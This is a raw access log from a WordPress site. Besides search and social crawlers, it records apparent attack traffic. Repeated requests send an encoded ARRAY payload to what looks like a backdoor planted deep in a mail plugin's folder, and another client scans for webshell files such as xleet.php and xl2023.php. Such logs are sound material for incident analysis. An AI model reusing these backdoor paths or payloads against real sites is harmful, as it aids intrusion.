66.249.72.37 - - [13/Sep/2025:08:13:58 -0700] "GET /odr/order/apiGetCartItems/ HTTP/1.1" 404 189 "http://haitiopen.com/?p=4078" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.37 - - [13/Sep/2025:08:14:02 -0700] "GET /ctg/apiAllLCate/ HTTP/1.1" 404 189 "http://haitiopen.com/?p=4078" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.39 - - [13/Sep/2025:08:14:06 -0700] "GET /resource/js/json/megadrop_2015new.json HTTP/1.1" 404 189 "http://haitiopen.com/?p=4078" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.37 - - [13/Sep/2025:08:14:09 -0700] "GET /resource/js/json/megadrop_2015new.json HTTP/1.1" 404 189 "http://haitiopen.com/?p=4078" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.236.205.121 - - [13/Sep/2025:08:14:26 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303030362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363430362q3166383432363931376531353964636164623533393863346134383764663662222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:14:26 -0700] "GET /wp-includes/fonts/class-wp-font-face-resolver.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:14:47 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303032372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363432372q3838373438376138383936376434383566366262613733326638626562396133222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:14:47 -0700] "GET /wp-includes/fonts/class-wp-font-face.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:14:47 -0700] "GET /wp-includes/fonts/class-wp-font-library.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:15:21 -0700] "GET /wp-includes/html-api/ HTTP/1.1" 200 507 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.20.105.74 - - [13/Sep/2025:08:15:38 -0700] "HEAD / HTTP/1.1" 499 0 "-" "DreamHost SiteMonitor 1.0"
43.157.179.227 - - [13/Sep/2025:08:15:45 -0700] "GET / HTTP/1.1" 499 0 "http://www.haitiopen.net" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
173.236.205.121 - - [13/Sep/2025:08:15:46 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303038362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363438362q6636353063393338396435343164343733376537623365336563346437636531222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:15:46 -0700] "GET /wp-includes/fonts/class-wp-font-utils.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:16:07 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303130372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363530372q3333633230623439313562343765643762303062376363333366633332373061222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:16:07 -0700] "GET /wp-includes/html-api/class-wp-html-active-formatting-elements.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:16:07 -0700] "GET /wp-includes/html-api/class-wp-html-attribute-token.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:17:06 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303136362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363536362q6633646261646133356262306430633938383034656162316232633330333330222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
173.236.205.121 - - [13/Sep/2025:08:17:27 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303138372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363538372q3939303533333132316638313437633238613831393464653330313437333431222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:17:27 -0700] "GET /wp-includes/html-api/class-wp-html-decoder.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:17:27 -0700] "GET /wp-includes/html-api/class-wp-html-doctype-info.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:18:26 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303234362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363634362q3935326463376235333463636463383033366264626363326334373639613937222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:18:26 -0700] "GET /wp-includes/html-api/class-wp-html-open-elements.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
89.248.172.183 - - [13/Sep/2025:08:18:44 -0700] "POST /wp-json/tdw/save_css HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:18:47 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303236372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363636372q6235656634653936323861653330326234393832333562383532393838363737222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:18:47 -0700] "GET /wp-includes/html-api/class-wp-html-processor-state.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:18:47 -0700] "GET /wp-includes/html-api/class-wp-html-processor.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:19:46 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303332362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363732362q3466333865316263356137643462383035373336303730636234303063373666222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:19:46 -0700] "GET /wp-includes/html-api/class-wp-html-span.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:20:07 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303334372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363734372q6439623837633535613437376631303466666161656634613763396439376630222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:20:07 -0700] "GET /wp-includes/html-api/class-wp-html-stack-event.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:20:07 -0700] "GET /wp-includes/html-api/class-wp-html-tag-processor.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.20.105.74 - - [13/Sep/2025:08:20:07 -0700] "HEAD / HTTP/1.1" 200 0 "-" "DreamHost SiteMonitor 1.0"
152.39.160.169 - - [13/Sep/2025:08:20:07 -0700] "GET /app-ads.txt HTTP/1.1" 404 189 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:20:59 -0700] "GET /xleet.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:21:06 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303430362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363830362q6266306636333733666632366139326563383265343238336639613631303565222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:21:06 -0700] "GET /wp-includes/html-api/class-wp-html-text-replacement.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:21:21 -0700] "GET /xl2023.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:21:27 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303432372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363832372q3665613162613765626431656466633036623932643264663436633330393330222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
57.141.0.42 - - [13/Sep/2025:08:21:27 -0700] "GET /?p=20973 HTTP/1.1" 200 54300 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
196.64.18.11 - - [13/Sep/2025:08:21:27 -0700] "GET /wp-includes/html-api/class-wp-html-token.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:21:27 -0700] "GET /wp-includes/html-api/class-wp-html-unsupported-exception.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:21:48 -0700] "GET /xl2023x.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:21:59 -0700] "GET /wp-includes/ID3/ HTTP/1.1" 200 526 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:22:05 -0700] "GET /wp-includes/images/ HTTP/1.1" 200 732 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:22:13 -0700] "GET /wp-includes/IXR/ HTTP/1.1" 200 358 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:22:15 -0700] "GET /xxl.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:22:20 -0700] "GET /wp-includes/js/ HTTP/1.1" 200 2072 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:22:26 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303438362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363838362q6162376135323330366236386166653238623038643533613437653162633636222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:22:26 -0700] "GET /wp-includes/html-api/html5-named-character-references.php HTTP/1.1" 500 5 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.72.37 - - [13/Sep/2025:08:22:26 -0700] "GET /?p=8242 HTTP/1.1" 200 36912 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
196.64.18.11 - - [13/Sep/2025:08:22:27 -0700] "GET /wp-includes/php-compat/ HTTP/1.1" 200 187 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:22:38 -0700] "GET /x.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:22:47 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303530372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363930372q6465643265376234643839653662356561313634396237633132656334336231222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:22:47 -0700] "GET /wp-includes/php-compat/readonly.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:01 -0700] "GET /wp-includes/PHPMailer/ HTTP/1.1" 200 234 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:05 -0700] "GET /xl.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:10 -0700] "GET /wp-includes/pomo/ HTTP/1.1" 200 279 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:17 -0700] "GET /wp-includes/random_compat/ HTTP/1.1" 404 189 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:28 -0700] "GET /wp-includes/Requests/ HTTP/1.1" 200 196 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:33 -0700] "GET /wp-admin/xl2023.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:35 -0700] "GET /wp-includes/rest-api/ HTTP/1.1" 200 296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.64.18.11 - - [13/Sep/2025:08:23:41 -0700] "GET /wp-includes/SimplePie/ HTTP/1.1" 200 233 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:23:46 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303536362p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363936362q3631643333393536383164376232386263666237343964353462613631626561222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:23:55 -0700] "GET /wp-includes/xl2023.php HTTP/1.1" 404 189 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.236.205.121 - - [13/Sep/2025:08:24:07 -0700] "GET /wp-content/plugins/wp-mail-smtp/vendor_prefixed/google/auth/src/Middleware/Middleware/index.php?ARRAY=7o2230223n313735373738303538372p2231223n22687474703n5p2s5p2s7n733537307631336o6s2r6r63686s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313735373737363938372q3963323936396435633036623066376537666164323531323065363661386436222p2232223n223539653264633932663438643565616231316437363261363564636532363036222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34372q35392q36352q37352q38332q3239227q HTTP/1.1" 504 167 "-" "-"
196.64.18.11 - - [13/Sep/2025:08:24:07 -0700] "GET /wp-includes/SimplePie/autoloader.php HTTP/1.1" 200 31 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
